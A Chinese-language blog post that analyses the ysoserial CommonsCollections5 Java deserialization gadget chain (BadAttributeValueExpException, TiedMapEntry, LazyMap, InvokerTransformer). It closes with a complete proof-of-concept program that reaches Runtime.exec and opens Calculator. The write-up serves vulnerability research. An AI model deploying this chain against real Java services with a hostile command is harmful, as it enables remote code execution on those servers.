Ananaskr's Blog
0%

ysoserial分析之CommonsCollections5

Posted on Edited on In

这篇文章分析的是CommonsCollections5,把它与CommonsCollections1进行对比的话,最外层的类由AnnotationInvocationHandler变成了BadAttributeValueExpException。最终的目标都是要触发LazyMap.get函数。

前面已经分析过
ysoserial分析之CommonsCollections1
ysoserial分析之CommonsCollections2
ysoserial分析之CommonsCollections3
ysoserial分析之CommonsCollections4

使用此payload进行利用时,需要未配置security-manager。来看看整个的利用链:

1
2
3
4
5
6
BadAttributeValueExpException.readObject()
  ->TiedMapEntry.toString()
    ->LazyMap.get()
      ->ChainedTransformer.transform()
        ->ConstantTransformer.transform()
        ->InvokerTransformer.transform()

利用链分析

为了要触发LazyMap.get函数,就必须找一个类,该类满足2个条件:1)类可序列化,类属性又个可控的Map或Object;2)该类的类函数上调用了Map.get。CommonsCollections5在这里用到了TiedMapEntry

该类有Map成员变量,且在getValue方法中调用了Map.get。现在的问题就变成了如何调用getValue方法。可以知道的是该类的toString、hashCode、equals均调用到了getValue函数。在这个利用链中利用的是toString函数。这里介绍一个类BadAttributeValueException。在它的readObject方法中调用了toString()函数。

首先定位到BadAttributeValueException类的readObject方法。可以看到当System.getSecurityManager为null或者当valObj是这7种类型之一的时,会调用toString()函数。很显然valObj的类型是TiedMapEntry,所以需要未对security-manager进行配置。

payload构造

那么现在很自然地可以想到,实例化一个TiedMapEntry类,类属性为构造好的LazyMap。那么代码如下所示:

1
2
3
4
5
6
7

Transformer chainedTransformer = new ChainedTransformer(transformers);
Map beforemap = new HashMap();
Map lazyMap = LazyMap.decorate(beforemap,chainedTransformer);

TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,1);

那么如何获取到valObj呢?查看BadAttributeValueException类readObject函数中,可以看到valObj是获取了BadAttributeValueException属性中的”val”属性。因此,需要将TiedMapEntry类作为BadAttributeValueException实例中的的val属性。

1
2
3
4
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valField = val.getClass().getDeclaredField("val");
valField.setAccessible(true);
valField.set(val,tiedMapEntry);

整个demo如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class test {

    public static void main(String[] args) throws Exception{


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/Applications/Calculator.app/Contents/MacOS/Calculator"})
        };
        Transformer chainedTransformer = new ChainedTransformer(transformers);
        Map beforemap = new HashMap();
        Map lazyMap = LazyMap.decorate(beforemap,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,1);

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valField = val.getClass().getDeclaredField("val");
        valField.setAccessible(true);
        valField.set(val,tiedMapEntry);


         ByteArrayOutputStream baos = new ByteArrayOutputStream();
         ObjectOutputStream out = new ObjectOutputStream(baos);
         out.writeObject(val);
         out.flush();
         out.close();

         byte[] bytes = baos.toByteArray();

         ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
         ObjectInputStream in = new ObjectInputStream(bais);
         in.readObject();
         in.close();

        }
}

结果如下图所示:

参考